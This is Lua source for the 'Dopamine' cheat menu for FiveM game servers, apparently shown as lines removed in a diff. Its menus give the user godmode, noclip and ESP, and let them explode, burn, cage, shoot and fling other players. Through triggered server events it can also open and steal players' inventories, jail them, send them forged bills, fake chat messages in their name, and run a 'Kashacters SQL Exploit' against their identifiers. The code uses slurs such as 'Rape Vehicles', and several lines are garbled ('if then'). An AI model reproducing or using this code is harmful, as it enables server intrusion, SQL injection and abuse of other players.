- introInteger = introInteger + 1
- end
- end)
- end
- if Dopamine.isMenuOpened('dopamine') then
- if Dopamine.menuButton('Self Options', 'selfOptions', '', {dict = 'mpleaderboard', text = 'leaderboard_deaths_icon', color = Dopamine.menuTabsColors.selfOptions}) then
- elseif Dopamine.menuButton('Online Players', 'onlinePlayersOptions', '', {dict = 'mpleaderboard', text = 'leaderboard_friends_icon', color = Dopamine.menuTabsColors.onlineOptions}) then
- elseif Dopamine.menuButton('Visual Options', 'visualOptions', '', {dict = 'mpleaderboard', text = 'leaderboard_bikers_icon', color = Dopamine.menuTabsColors.visualOptions}) then
- elseif Dopamine.menuButton('Teleport Options', 'teleportOptions', '', {dict = 'mpleaderboard', text = 'leaderboard_star_icon', color = Dopamine.menuTabsColors.teleportOptions}) then
- elseif Dopamine.menuButton('Vehicle Options', 'vehicleOptions', '', {dict = 'mpleaderboard', text = 'leaderboard_steeringwheel_icon', color = Dopamine.menuTabsColors.vehicleOptions}) then
- elseif Dopamine.menuButton('Weapon Options', 'weaponOptions', '', {dict = 'mpleaderboard', text = 'leaderboard_kd_icon', color = Dopamine.menuTabsColors.weaponOptions}) then
- elseif Dopamine.menuButton('Server Options', 'serverOptions', '', {dict = 'mpleaderboard', text = 'leaderboard_globe_icon', color = Dopamine.menuTabsColors.serverOptions}) then
- elseif Dopamine.menuButton('Menu Options', 'menuSettings', '', {dict = 'mpleaderboard', text = 'leaderboard_position_icon', color = Dopamine.menuTabsColors.menuOptions}) then
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('selfOptions') then
- if Dopamine.menuButton('Super Powers', 'selfSuperPowers') then
- elseif Dopamine.menuButton('Clothing', 'selfClothing') then
- elseif Dopamine.checkBox('Godmode', Dopamine.storedControls.godmode) then
- Dopamine.storedControls.godmode = not Dopamine.storedControls.godmode
- elseif Dopamine.checkBox('Semi Godmode', Dopamine.storedControls.semiGodmode) then
- Dopamine.storedControls.semiGodmode = not Dopamine.storedControls.semiGodmode
- elseif Dopamine.checkBox('Infinite Stamina', Dopamine.storedControls.infStamina) then
- Dopamine.storedControls.infStamina = not Dopamine.storedControls.infStamina
- elseif Dopamine.checkBox('Noclip', Dopamine.storedControls.noClip) then
- Dopamine.functions.toggleNoclip()
- elseif Dopamine.checkBox('No Ragdoll', Dopamine.storedControls.noRagdoll) then
- Dopamine.storedControls.noRagdoll = not Dopamine.storedControls.noRagdoll
- elseif Dopamine.checkBox('Never Wanted', Dopamine.storedControls.neverWanted) then
- Dopamine.storedControls.neverWanted = not Dopamine.storedControls.neverWanted
- elseif Dopamine.checkBox('Invisible', Dopamine.storedControls.invisible) then
- Dopamine.storedControls.invisible = not Dopamine.storedControls.invisible
- elseif Dopamine.button('Revive', 'Native') then
- Dopamine.functions.nativeRevive()
- elseif Dopamine.button('Suicide', 'Native') then
- Dopamine.natives.setEntityHealth(Dopamine.datastore.pLocalPlayer.pedId, 0)
- elseif Dopamine.button('Refill Health', 'Native') then
- Dopamine.natives.setEntityHealth(Dopamine.datastore.pLocalPlayer.pedId, 200)
- Dopamine.pushNotification('Health refilled', 5000)
- elseif Dopamine.button('Refill Armour', 'Native') then
- Dopamine.natives.setPedArmour(Dopamine.datastore.pLocalPlayer.pedId, 200)
- Dopamine.pushNotification('Armour refilled', 5000)
- elseif Dopamine.button('Refill Stamina', 'Native') then
- ResetPlayerStamina(Dopamine.datastore.pLocalPlayer.pedId)
- elseif Dopamine.comboBox('Disappear From Chase', {'In the sky', 'Legion Square', 'Vespucci Beach', 'Sandy Shores', 'Blaine County'}, Dopamine.storedControls.currentDisappearFromChase, Dopamine.storedControls.selectedDisappearFromChase,
- function(currentIndex, selectedIndex)
- Dopamine.storedControls.currentDisappearFromChase = currentIndex
- Dopamine.storedControls.selectedDisappearFromChase = currentIndex
- end) then
- Dopamine.functions.disappearFromChase()
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('selfSuperPowers') then
- if Dopamine.button('Kill Nearby Peds', 'Native') then
- Dopamine.functions.killNearbyPeds()
- elseif Dopamine.checkBox('Super Jump', Dopamine.storedControls.superJump) then
- Dopamine.storedControls.superJump = not Dopamine.storedControls.superJump
- elseif Dopamine.checkBox('Magneto', Dopamine.storedControls.magnetoMode) then
- Dopamine.storedControls.magnetoMode = not Dopamine.storedControls.magnetoMode
- Dopamine.functions.magnetoMode()
- elseif Dopamine.checkBox('Heat Vision', Dopamine.storedControls.heatVision) then
- Dopamine.storedControls.heatVision = not Dopamine.storedControls.heatVision
- elseif Dopamine.checkBox('Night Vision', Dopamine.storedControls.nightVision) then
- Dopamine.storedControls.nightVision = not Dopamine.storedControls.nightVision
- elseif Dopamine.checkBox('Become Tiny', Dopamine.storedControls.tinyPlayer) then
- Dopamine.storedControls.tinyPlayer = not Dopamine.storedControls.tinyPlayer
- elseif Dopamine.checkBox('Become The Flash', Dopamine.storedControls.flashmanSP) then
- Dopamine.storedControls.flashmanSP = not Dopamine.storedControls.flashmanSP
- elseif Dopamine.comboBoxSlider('Fast Run', FastCBWords, currentFastRunIndex, selectedFastRunIndex,
- function(currentIndex, selectedIndex)
- currentFastRunIndex = currentIndex
- selectedFastRunIndex = currentIndex
- FastRunMultiplier = FastCB[currentIndex]
- if not Dopamine.storedControls.flashmanSP then
- SetRunSprintMultiplierForPlayer(PlayerId(), FastRunMultiplier)
- end
- end) then
- elseif Dopamine.comboBoxSlider('Fast Swim', FastCBWords, currentFastSwimIndex, selectedFastSwimIndex,
- function(currentIndex, selectedIndex)
- currentFastSwimIndex = currentIndex
- selectedFastSwimIndex = currentIndex
- FastSwimMultiplier = FastCB[currentIndex]
- SetSwimMultiplierForPlayer(PlayerId(), FastSwimMultiplier)
- end) then
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('selfClothing') then
- if Dopamine.button('Random Outfit', 'Native') then
- Dopamine.functions.randomClothes(PlayerId())
- elseif Dopamine.button('Nertigel\'s Outfit', 'Native') then
- Dopamine.functions.resetAppearance()
- Dopamine.functions.changeAppearance('HAIR', 32, 0)
- Dopamine.functions.changeAppearance('HATS', 12, 0)
- Dopamine.functions.changeAppearance('TORSO', 75, 0)
- Dopamine.functions.changeAppearance('TORSO2', 20, 2)
- Dopamine.functions.changeAppearance('LEGS', 20, 2)
- Dopamine.functions.changeAppearance('HANDS', 0, 0)
- Dopamine.functions.changeAppearance('GLASSES', 6, 2)
- Dopamine.functions.changeAppearance('SHOES', 20, 3)
- elseif Dopamine.button('Balla', 'Native') then
- Dopamine.functions.resetAppearance()
- Dopamine.functions.changeAppearance('HATS', 10, 7)
- Dopamine.functions.changeAppearance('GLASSES', 17, 6)
- Dopamine.functions.changeAppearance('MASK', 51, 6)
- Dopamine.functions.changeAppearance('TORSO', 14, 0)
- Dopamine.functions.changeAppearance('LEGS', 5, 9)
- Dopamine.functions.changeAppearance('SHOES', 9, 5)
- Dopamine.functions.changeAppearance('SPECIAL2', 23, 0)
- Dopamine.functions.changeAppearance('TORSO2', 7, 9)
- elseif Dopamine.button('SWAT', 'Native') then
- Dopamine.functions.resetAppearance()
- Dopamine.functions.changeAppearance('TORSO', 17, 0)
- Dopamine.functions.changeAppearance('MASK', 56, 1)
- Dopamine.functions.changeAppearance('HATS', 40, 0)
- Dopamine.functions.changeAppearance('HAIR', 0, 0)
- Dopamine.functions.changeAppearance('TORSO', 19, 0)
- Dopamine.functions.changeAppearance('GLASSES', 0, 1)
- Dopamine.functions.changeAppearance('LEGS', 34, 0)
- Dopamine.functions.changeAppearance('SHOES', 25, 0)
- Dopamine.functions.changeAppearance('SPECIAL', 0, 0)
- Dopamine.functions.changeAppearance('SPECIAL2', 58, 0)
- Dopamine.functions.changeAppearance('SPECIAL3', 4, 1)
- Dopamine.functions.changeAppearance('TORSO2', 55, 0)
- Dopamine.functions.changeAppearance('HANDS', 0, 0)
- elseif Dopamine.button('Ghost', 'Native') then
- Dopamine.functions.resetAppearance()
- Dopamine.functions.changeAppearance('TORSO', 17, 0)
- Dopamine.functions.changeAppearance('MASK', 29, 0)
- Dopamine.functions.changeAppearance('HATS', 28, 0)
- Dopamine.functions.changeAppearance('HAIR', 0, 0)
- Dopamine.functions.changeAppearance('GLASSES', 0, 1)
- Dopamine.functions.changeAppearance('LEGS', 31, 0)
- Dopamine.functions.changeAppearance('SHOES', 24, 0)
- Dopamine.functions.changeAppearance('SPECIAL', 30, 2)
- Dopamine.functions.changeAppearance('SPECIAL2', 15, 0)
- Dopamine.functions.changeAppearance('TORSO2', 50, 0)
- Dopamine.functions.changeAppearance('HANDS', 0, 0)
- elseif Dopamine.button('Elf', 'Native') then
- Dopamine.functions.resetAppearance()
- Dopamine.functions.changeAppearance('MASK', 34, 0)
- Dopamine.functions.changeAppearance('TORSO', 4, 0)
- Dopamine.functions.changeAppearance('LEGS', 19, 1)
- Dopamine.functions.changeAppearance('SHOES', 22, 1)
- Dopamine.functions.changeAppearance('SPECIAL1', 18, 0)
- Dopamine.functions.changeAppearance('SPECIAL2', 28, 8)
- Dopamine.functions.changeAppearance('TORSO2', 19, 1)
- elseif Dopamine.button('Thug', 'Native') then
- Dopamine.functions.resetAppearance()
- Dopamine.functions.changeAppearance('HATS', 46, 1)
- Dopamine.functions.changeAppearance('GLASSES', 17, 6)
- Dopamine.functions.changeAppearance('MASK', 51, 7)
- Dopamine.functions.changeAppearance('TORSO', 22, 0)
- Dopamine.functions.changeAppearance('LEGS', 7, 0)
- Dopamine.functions.changeAppearance('HANDS', 44, 0)
- Dopamine.functions.changeAppearance('SHOES', 12, 6)
- Dopamine.functions.changeAppearance('SPECIAL2', 15, 0)
- Dopamine.functions.changeAppearance('TORSO2', 14, 7)
- elseif Dopamine.button('Santa Claus', 'Native') then
- Dopamine.functions.resetAppearance()
- Dopamine.functions.changeAppearance('MASK', 8, 0)
- Dopamine.functions.changeAppearance('TORSO', 12, 0)
- Dopamine.functions.changeAppearance('LEGS', 19, 0)
- Dopamine.functions.changeAppearance('SHOES', 4, 4)
- Dopamine.functions.changeAppearance('SPECIAL1', 10, 0)
- Dopamine.functions.changeAppearance('SPECIAL2', 21, 2)
- Dopamine.functions.changeAppearance('TORSO2', 19, 0)
- elseif Dopamine.button('Penguin', 'Native') then
- Dopamine.functions.resetAppearance()
- Dopamine.functions.changeAppearance('TORSO', 0, 0)
- Dopamine.functions.changeAppearance('MASK', 31, 0)
- Dopamine.functions.changeAppearance('HATS', 0, 0)
- Dopamine.functions.changeAppearance('HAIR', 0, 0)
- Dopamine.functions.changeAppearance('GLASSES', 0, 0)
- Dopamine.functions.changeAppearance('LEGS', 32, 0)
- Dopamine.functions.changeAppearance('SHOES', 17, 0)
- Dopamine.functions.changeAppearance('SPECIAL1', 0, 0)
- Dopamine.functions.changeAppearance('SPECIAL2', 57, 0)
- --[[Dopamine.functions.changeAppearance('SPECIAL3', 0, 0)]]
- Dopamine.functions.changeAppearance('TEXTURES', 0, 0)
- Dopamine.functions.changeAppearance('TORSO2', 51, 0)
- Dopamine.functions.changeAppearance('HANDS', 0, 0)
- elseif Dopamine.button('Soldier', 'Native') then
- Dopamine.functions.resetAppearance()
- Dopamine.functions.changeAppearance('TORSO', 96, 0)
- Dopamine.functions.changeAppearance('HATS', 40, 0)
- Dopamine.functions.changeAppearance('MASK', 54, 0)
- Dopamine.functions.changeAppearance('GLASSES', 0, 1)
- Dopamine.functions.changeAppearance('LEGS', 34, 0)
- Dopamine.functions.changeAppearance('SHOES', 25, 0)
- Dopamine.functions.changeAppearance('SPECIAL1', 0, 0)
- Dopamine.functions.changeAppearance('SPECIAL2', 15, 0)
- Dopamine.functions.changeAppearance('TORSO2', 53, 0)
- Dopamine.functions.changeAppearance('HANDS', 51, 0)
- elseif Dopamine.button('Soldier 2', 'Native') then
- Dopamine.functions.resetAppearance()
- Dopamine.functions.changeAppearance('HATS', 40, 0)
- Dopamine.functions.changeAppearance('MASK', 28, 0)
- Dopamine.functions.changeAppearance('TORSO', 44, 0)
- Dopamine.functions.changeAppearance('LEGS', 34, 0)
- Dopamine.functions.changeAppearance('HANDS', 45, 0)
- Dopamine.functions.changeAppearance('SHOES', 25, 0)
- Dopamine.functions.changeAppearance('SPECIAL2', 56, 1)
- Dopamine.functions.changeAppearance('TORSO2', 53, 0)
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('onlinePlayersOptions') then
- Dopamine.setSubTitle('onlinePlayersOptions', #Dopamine.natives.getActivePlayers()..' Player(s) Online')
- if Dopamine.menuButton('All Players / World', 'allPlayersOptions') then
- else
- local playerlist = Dopamine.natives.getActivePlayers()
- for i = 1, #playerlist do
- local currentPlayer = playerlist[i]
- if Dopamine.menuButton('~b~[C:'..currentPlayer..' | S:'..GetPlayerServerId(currentPlayer)..']~m~ '..GetPlayerName(currentPlayer)..Dopamine.trashFunctions.getPlayerStatus(GetPlayerPed(currentPlayer)), 'selectedPlayerOptions') then
- selectedPlayer = currentPlayer
- end
- end
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('allPlayersOptions') then
- if Dopamine.menuButton('Trigger Events', 'allPlayersOptionsTriggers') then
- elseif Dopamine.button('Give Everyone Weapons', 'Native') then
- Dopamine.functions.aPO.giveAllWeapons(false)
- elseif Dopamine.button('Give Everyone Weapons As Pickups', 'Native') then
- Dopamine.functions.aPO.giveAllWeapons(true)
- elseif Dopamine.button('Rape Vehicles', 'Native') then
- Dopamine.functions.aPO.rapeVehicles()
- elseif Dopamine.button('Explode Vehicles', 'Native') then
- Dopamine.functions.aPO.explodeCars()
- elseif Dopamine.button('Clone Peds', 'Native') then
- Dopamine.functions.aPO.clonePeds()
- elseif Dopamine.button('Burn Effect', 'Native') then
- Dopamine.functions.aPO.burnSFX()
- elseif Dopamine.comboBox('Spawn Props', Dopamine.comboBoxes[4]._words, Dopamine.comboBoxes[4]._current, Dopamine.comboBoxes[4]._selected,
- function(currentIndex, selectedIndex)
- Dopamine.comboBoxes[4]._current = currentIndex
- Dopamine.comboBoxes[4]._selected = currentIndex
- end) then
- if type(Dopamine.comboBoxes[4]._actual[Dopamine.comboBoxes[4]._selected]) == 'table' then
- for key, value in pairs(Dopamine.comboBoxes[4]._actual[Dopamine.comboBoxes[4]._selected]) do
- Dopamine.functions.aPO.spawnTrollProp(Dopamine.comboBoxes[4]._actual[Dopamine.comboBoxes[4]._selected][key])
- end
- else
- Dopamine.functions.aPO.spawnTrollProp(Dopamine.comboBoxes[4]._actual[Dopamine.comboBoxes[4]._selected])
- end
- elseif Dopamine.comboBox('Prop Block', Dopamine.menuTables.trollsPropBlock.words, Dopamine.menuTables.trollsPropBlock.current, Dopamine.menuTables.trollsPropBlock.selected,
- function(currentIndex, selectedIndex)
- Dopamine.menuTables.trollsPropBlock.current = currentIndex
- Dopamine.menuTables.trollsPropBlock.selected = currentIndex
- end)
- then
- Dopamine.functions.aPO.propBlock(Dopamine.menuTables.trollsPropBlock.selected)
- elseif Dopamine.checkBox('Flying Cars', Dopamine.storedControls.aPOFlyingCars) then
- Dopamine.storedControls.aPOFlyingCars = not Dopamine.storedControls.aPOFlyingCars
- elseif Dopamine.checkBox('Freeze', Dopamine.storedControls.aPOFreeze) then
- Dopamine.storedControls.aPOFreeze = not Dopamine.storedControls.aPOFreeze
- elseif Dopamine.checkBox('Disable Driving Vehicles', Dopamine.storedControls.aPODisableDrivingCars) then
- Dopamine.storedControls.aPODisableDrivingCars = not Dopamine.storedControls.aPODisableDrivingCars
- elseif Dopamine.checkBox('Noisy Vehicles', Dopamine.storedControls.aPONoisyVehs) then
- Dopamine.storedControls.aPONoisyVehs = not Dopamine.storedControls.aPONoisyVehs
- elseif Dopamine.button('Run Everything ~r~(!)', 'Native') then
- pCreateThread(function()
- Dopamine.functions.aPO.rapeVehicles()
- pWait(500)
- Dopamine.functions.aPO.explodeCars()
- pWait(500)
- Dopamine.functions.aPO.clonePeds()
- pWait(500)
- Dopamine.functions.aPO.burnSFX()
- pWait(500)
- Dopamine.functions.aPO.flyingCars()
- for key, value in pairs(Dopamine.comboBoxes[4]._actual) do
- if type(value) ~= 'table' then
- Dopamine.functions.aPO.spawnTrollProp(v)
- end
- Wait(500)
- end
- end)
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('allPlayersOptionsTriggers') then
- if Dopamine.button('Jail', 'ESX | Server') then
- Dopamine.functions.aPO.jail()
- elseif Dopamine.button('Un-Jail', 'ESX | Server') then
- Dopamine.functions.aPO.unJail()
- elseif Dopamine.button('Community Service', 'ESX | Server') then
- Dopamine.functions.aPO.communityService()
- elseif Dopamine.button('Spawn Owned Vehicles', 'ESX | Server') then
- for yeet=0, #Dopamine.natives.getActivePlayers() do
- Dopamine.functions.sPO.SpawnLegalVehicle('blista', yeet, Dopamine.trashFunctions.getRandomLetter(3) .. ' ' .. Dopamine.trashFunctions.getRandomNumber(4))
- end
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('selectedPlayerOptions') then
- Dopamine.setSubTitle('selectedPlayerOptions', '~b~['..GetPlayerServerId(selectedPlayer)..']~m~ '..GetPlayerName(selectedPlayer)..Dopamine.trashFunctions.getPlayerStatus(GetPlayerPed(currentPlayer)))
- if Dopamine.menuButton('Weapon Options', 'selectedPlayerOptionsWeapon') then
- elseif Dopamine.menuButton('Troll Options', 'selectedPlayerOptionsTroll') then
- elseif Dopamine.menuButton('Trigger Options', 'selectedPlayerOptionsTriggers') then
- elseif Dopamine.button('Spectate', Dopamine.storedControls.sPOIsSpectating and 'Spectating: ['..GetPlayerServerId(Dopamine.storedControls.spectatedPlayer)..']' or 'Spectating: [-1]') then
- Dopamine.storedControls.spectatedPlayer = selectedPlayer
- Dopamine.functions.sPO.spectatePlayer(Dopamine.storedControls.spectatedPlayer)
- elseif Dopamine.button('Give Health', 'Native') then
- Dopamine.natives.setEntityHealth(GetPlayerPed(selectedPlayer), 200)
- CreatePickup(GetHashKey('PICKUP_HEALTH_STANDARD'), GetEntityCoords(GetPlayerPed(selectedPlayer)))
- elseif Dopamine.button('Give Armour', 'Native') then
- Dopamine.natives.setPedArmour(GetPlayerPed(selectedPlayer), 200)
- CreatePickup(GetHashKey('PICKUP_ARMOUR_STANDARD'), GetEntityCoords(GetPlayerPed(selectedPlayer)))
- elseif Dopamine.button('Teleport To', 'Native') then
- Dopamine.functions.sPO.teleportToPlayer(selectedPlayer)
- elseif Dopamine.button('Teleport Into Vehicle', 'Native') then
- Dopamine.functions.sPO.teleportIntoVehicle(GetPlayerPed(selectedPlayer))
- elseif Dopamine.button('Clone Vehicle', 'Native') then
- Dopamine.functions.sPO.cloneVehicle(selectedPlayer)
- elseif Dopamine.button('Clone Outfit', 'Native') then
- Dopamine.functions.sPO.clonePedOutfit(Dopamine.datastore.pLocalPlayer.pedId, GetPlayerPed(selectedPlayer))
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('selectedPlayerOptionsWeapon') then
- if Dopamine.checkBox('Spawn As Pickup', Dopamine.storedControls.weapSpawnAsPickup) then
- Dopamine.storedControls.weapSpawnAsPickup = not Dopamine.storedControls.weapSpawnAsPickup
- elseif Dopamine.button('Give All Weapons', 'Native') then
- Dopamine.functions.sPO.giveAllWeapons(Dopamine.storedControls.weapSpawnAsPickup, GetPlayerPed(selectedPlayer))
- elseif Dopamine.button('Remove All Weapons', 'Native') then
- Dopamine.trashFunctions.reqControlOnce(GetPlayerPed(selectedPlayer))
- RemoveAllPedWeapons(GetPlayerPed(selectedPlayer), true)
- RemoveAllPedWeapons(GetPlayerPed(selectedPlayer), false)
- elseif Dopamine.button('Give Ammo', 'Native') then
- for i = 1, #Dopamine.trashTables.weaponsModels do
- AddAmmoToPed(GetPlayerPed(selectedPlayer), GetHashKey(Dopamine.trashTables.weaponsModels[i]), 250)
- end
- end
- for i = 1, #Dopamine.trashTables.weaponsModels do
- if Dopamine.button(Dopamine.trashTables.weaponsModels[i]) then
- if Dopamine.storedControls.weapSpawnAsPickup then
- CreatePickup(GetHashKey('PICKUP_'..Dopamine.trashTables.weaponsModels[i]), GetEntityCoords(Dopamine.datastore.pLocalPlayer.pedId))
- else
- Dopamine.natives.giveWeaponToPed(GetPlayerPed(selectedPlayer), GetHashKey(Dopamine.trashTables.weaponsModels[i]), 250, false, true)
- end
- end
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('selectedPlayerOptionsTriggers') then
- if Dopamine.button('Open Inventory', 'ESX | Client') then
- Dopamine.dTCE(false, false, 'esx_inventoryhud:openPlayerInventory', GetPlayerServerId(selectedPlayer), GetPlayerName(selectedPlayer))
- elseif Dopamine.button('Disc Search Inventory', 'ESX | Client') then
- Dopamine.functions.sPO.SearchDisc(GetPlayerServerId(selectedPlayer))
- elseif Dopamine.button('Disc Steal Inventory', 'ESX | Client') then
- Dopamine.functions.sPO.StealDisc(GetPlayerServerId(selectedPlayer))
- elseif Dopamine.button('Jail', 'ESX | Server') then
- local time = Dopamine.trashFunctions.keyboardInput('Enter amount of time', '5391', 12)
- if then time = 5391 end
- Dopamine.functions.sPO.jailTheFucker(GetPlayerServerId(selectedPlayer), time)
- elseif Dopamine.button('Un-Jail', 'ESX | Server') then
- Dopamine.functions.sPO.unJailTheFucker(GetPlayerServerId(selectedPlayer))
- elseif Dopamine.button('Community Service', 'ESX | Server') then
- Dopamine.functions.sPO.communityService(GetPlayerServerId(selectedPlayer))
- elseif Dopamine.button('Send Bill', 'ESX | Server') then
- local billAmount = Dopamine.trashFunctions.keyboardInput('Enter amount', '', 10)
- local billName = Dopamine.trashFunctions.keyboardInput('Enter the name of the bill', '', 10)
- if not and not then
- if Dopamine.functions.doesResourceExist('esx_billing') then
- Dopamine.dTCE(false, true, 'esx_billing:sendBill', GetPlayerServerId(selectedPlayer), 'd0pamine', billName, billAmount)
- Dopamine.dTCE(false, true, 'esx_billing:sendBill', GetPlayerServerId(selectedPlayer), 'd0pamine', billName, billAmount)
- else Dopamine.pushNotification('Resource was not found!', 5000) end
- end
- elseif Dopamine.button('Spawn Owned Vehicle', 'ESX | Server') then
- local ModelName = Dopamine.trashFunctions.keyboardInput('Enter Vehicle Spawn Name', '', 20)
- local PlateNumber = Dopamine.trashFunctions.keyboardInput('Enter Vehicle Plate Number', '', 8)
- Dopamine.functions.sPO.SpawnLegalVehicle(ModelName, selectedPlayer, PlateNumber)
- elseif Dopamine.button('Revive Player', 'ESX | Server') then
- Dopamine.dTCE(false, true, 'esx_ambulancejob:revive', GetPlayerServerId(selectedPlayer))
- Dopamine.dTCE(false, false, 'esx_ambulancejob:revive', GetPlayerServerId(selectedPlayer))
- elseif Dopamine.button('Send Fake Message', 'Server') then
- local message = Dopamine.trashFunctions.keyboardInput('Enter message to send', '', 100)
- if not then
- Dopamine.dTCE(false, true, '_chat:messageEntered', GetPlayerName(selectedPlayer), {Dopamine.mainColor.r,Dopamine.mainColor.g,Dopamine.mainColor.b}, message)
- end
- elseif Dopamine.comboBox('Kashacters SQL Exploit', Dopamine.menuTables.serverKashactersSQL.words, Dopamine.menuTables.serverKashactersSQL.current, Dopamine.menuTables.serverKashactersSQL.selected,
- function(currentIndex, selectedIndex)
- Dopamine.menuTables.serverKashactersSQL.current = currentIndex
- Dopamine.menuTables.serverKashactersSQL.selected = currentIndex
- Dopamine.menuTables.serverKashactersSQL.actual = Dopamine.menuTables.serverKashactersSQL.lists[Dopamine.menuTables.serverKashactersSQL.selected]
- end)
- then
- if Dopamine.datastore.ESX ~= nil then
- Dopamine.datastore.ESX.TriggerServerCallback('esx_society:getOnlinePlayers', function(players)
- local xPlayer = nil
- for i = 1, #players do
- if players[i].name == GetPlayerName(selectedPlayer) then xPlayer = players[i] end
- end
- if xPlayer then
- dir_print(Dopamine.menuTables.serverKashactersSQL.actual)
- Dopamine.functions.exploits.esx_kashacters(xPlayer.identifier, 'clean', Dopamine.menuTables.serverKashactersSQL.actual)
- else
- dir_print('issue getting xPlayer')
- end
- end)
- else
- dir_print('issue getting ESX')
- end
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('selectedPlayerOptionsTroll') then
- if Dopamine.button('Clear Animation/Tasks', 'Native') then
- Dopamine.natives.clearPedTasksImmediately(GetPlayerPed(selectedPlayer))
- elseif Dopamine.button('Burn Player ~w~', 'Native') then
- local x, y, z = table.unpack(GetEntityCoords(GetPlayerPed(selectedPlayer)))
- for i=0, 5 do
- StartScriptFire(x, y, z - 0.99, 25, true)
- end
- elseif Dopamine.button('Rape Vehicle', 'Native') then
- local lastVehicle = GetVehiclePedIsIn(GetPlayerPed(selectedPlayer), false)
- Dopamine.natives.clearPedTasksImmediately(GetPlayerPed(selectedPlayer))
- Dopamine.functions.sPO.rapeVehicle(lastVehicle)
- elseif Dopamine.button('Spawn Weapon Pickups', 'Native') then
- Dopamine.functions.sPO.giveAllWeapons(true, GetPlayerPed(selectedPlayer))
- elseif Dopamine.button('Spawn Enemies', 'Native') then
- Dopamine.functions.sPO.spawnEnemies(GetPlayerPed(selectedPlayer), 'a_m_y_skater_01')
- elseif Dopamine.button('Spawn Heli Enemies', 'Native') then
- Dopamine.functions.sPO.spawnHeliEnemies(GetPlayerPed(selectedPlayer))
- elseif Dopamine.button('Spawn Tank Enemy', 'Native') then
- Dopamine.functions.sPO.spawnTankEnemy(GetPlayerPed(selectedPlayer))
- elseif Dopamine.button('Cage', 'Native') then
- Dopamine.functions.sPO.cagePlayer(GetPlayerPed(selectedPlayer))
- elseif Dopamine.button('Explode ~r~(!)', 'Native') then
- local coords = GetEntityCoords(GetPlayerPed(selectedPlayer))
- Dopamine.natives.addExplosion(coords.x+1, coords.y+1, coords.z+1, 4, 100.0, true, false, 0.0)
- elseif Dopamine.comboBox('Shoot Player', {'Taze', 'Pistol', 'AK'}, Dopamine.storedControls.sPOShootAtOptionsCurrent, Dopamine.storedControls.sPOShootAtOptionsSelected,
- function(currentIndex, selectedIndex)
- Dopamine.storedControls.sPOShootAtOptionsCurrent = currentIndex
- Dopamine.storedControls.sPOShootAtOptionsSelected = currentIndex
- end) then
- if Dopamine.storedControls.sPOShootAtOptionsSelected == 1 then
- Dopamine.functions.sPO.shootAt(GetPlayerPed(selectedPlayer), 'WEAPON_STUNGUN')
- elseif Dopamine.storedControls.sPOShootAtOptionsSelected == 2 then
- Dopamine.functions.sPO.shootAt(GetPlayerPed(selectedPlayer), 'WEAPON_PISTOL')
- elseif Dopamine.storedControls.sPOShootAtOptionsSelected == 3 then
- Dopamine.functions.sPO.shootAt(GetPlayerPed(selectedPlayer), 'WEAPON_ASSAULTRIFLE')
- end
- elseif Dopamine.comboBox('Spawn Props', Dopamine.comboBoxes[4]._words, Dopamine.comboBoxes[4]._current, Dopamine.comboBoxes[4]._selected,
- function(currentIndex, selectedIndex)
- Dopamine.comboBoxes[4]._current = currentIndex
- Dopamine.comboBoxes[4]._selected = currentIndex
- end) then
- if type(Dopamine.comboBoxes[4]._actual[Dopamine.comboBoxes[4]._selected]) == 'table' then
- for key, value in pairs(Dopamine.comboBoxes[4]._actual[Dopamine.comboBoxes[4]._selected]) do
- Dopamine.functions.sPO.spawnTrollProp(GetPlayerPed(selectedPlayer), Dopamine.comboBoxes[4]._actual[Dopamine.comboBoxes[4]._selected][key])
- end
- else
- Dopamine.functions.sPO.spawnTrollProp(GetPlayerPed(selectedPlayer), Dopamine.comboBoxes[4]._actual[Dopamine.comboBoxes[4]._selected])
- end
- elseif Dopamine.comboBox('Ram Vehicle', sPORamVehicleWords, sPORamVehicleCurrent, sPORamVehicleSelected,
- function(currentIndex, selectedIndex)
- sPORamVehicleCurrent = currentIndex
- sPORamVehicleSelected = currentIndex
- sPORamVehicleX = sPORamVehicleWords[currentIndex]
- end) then
- Dopamine.functions.sPO.ramVehicle(GetPlayerPed(selectedPlayer), sPORamVehicleX)
- elseif Dopamine.button('Fling Player ~r~(!)', Dopamine.storedControls.sPOFlingPlayer and 'Flinging: ['..GetPlayerServerId(Dopamine.storedControls.sPOFlingedPlayer)..']' or 'Flinging: [-1]') then
- Dopamine.storedControls.sPOFlingPlayer = not Dopamine.storedControls.sPOFlingPlayer
- Dopamine.storedControls.sPOFlingedPlayer = selectedPlayer
- end
- Dopamine.runDrawMenu()
- elseif Dopamine.isMenuOpened('visualOptions') then
- if Dopamine.menuButton('Extra Sensory Perception', 'visualOptionsESP', '', {dict = 'mphud', text = 'spectating', color = {r=255, g=255, b=255}}) then
- elseif Dopamine.comboBox('Crosshair', customCrosshairOpts, currentCustomCrosshair, selectedCustomCrosshair,
- function(currentIndex, selectedIndex)
- currentCustomCrosshair = currentIndex
- selectedCustomCrosshair = currentIndex
- end)
- then
- elseif Dopamine.checkBox('Draw FPS', Dopamine.storedControls.visDrawFPS) then
- Dopamine.storedControls.visDrawFPS = not Dopamine.storedControls.visDrawFPS
- elseif Dopamine.checkBox('Show Coords', Dopamine.storedControls.teleShowCoords) then
- Dopamine.storedControls.teleShowCoords = not Dopamine.storedControls.teleShowCoords
- elseif Dopamine.checkBox('Force Player Blips', Dopamine.storedControls.visPlayerBlips) then
- Dopamine.storedControls.visPlayerBlips = not Dopamine.storedControls.visPlayerBlips
- elseif Dopamine.checkBox('Force Radar', Dopamine.storedControls.visForceRadar) then
- Dopamine.storedControls.visForceRadar = not Dopamine.storedControls.visForceRadar
- elseif Dopamine.checkBox('Force Gamertags', Dopamine.storedControls.visForceGamertags) then
- Dopamine.storedControls.visForceGamertags = not Dopamine.storedControls.visForceGamertags
- elseif Dopamine.checkBox('Force Third-person', Dopamine.storedControls.visForceThirdperson) then
- Dopamine.storedControls.visForceThirdperson = not Dopamine.storedControls.visForceThirdperson
